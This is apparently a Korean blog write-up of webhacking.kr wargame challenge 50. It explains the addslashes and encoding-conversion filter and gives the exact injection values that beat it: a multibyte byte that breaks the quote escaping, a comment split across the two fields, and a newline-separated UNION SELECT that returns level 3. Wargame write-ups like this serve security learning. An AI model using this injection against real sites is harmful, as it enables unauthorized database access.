728x90
반응형
450점인 50번 문제를 풀어보자.
addslashes() : DB에서 ', ", /, Null Byte 와 같이 특수문자들을 이스케이프 처리해주는 함수
mb_convert_encoding(문자열,바꿀 인코딩,현재인코딩); : 인코딩 변환
id와 pw에는 from, pw, (, ), 공백, %, =, >, < 문자열을 필터링 된다. id에는 추가적으로 union 문자열이 필터링 된다.
최종적으로 쿼리의 결과가 lv=3이면 문제가 풀리게 된다.
id = guest%a1'/*
pw = */union%0aselect%0a3#
id와 pw값을 이렇게 넣어주게 되면 /**/부분이 주석처리가 되므로 pw부분은 생략이 가능하여 union select구문을 이용하여 바로 3을 반환시킬 수 있다.
select lv from members where id='guest%a1' /*and pw=md5('*/union select 3#')
728x90
반응형
'CTF & WarGame > webhacking.kr' 카테고리의 다른 글
| [webhacking.kr] 52번 문제 (0) | 2020.03.16 |
|---|---|
| [webhacking.kr] 51번 문제 (0) | 2020.03.15 |
| [webhacking.kr] 49번 문제 (0) | 2020.03.15 |
| [webhacking.kr] 48번 문제 (0) | 2020.03.15 |
| [webhacking.kr] 47번 문제 (0) | 2020.03.15 |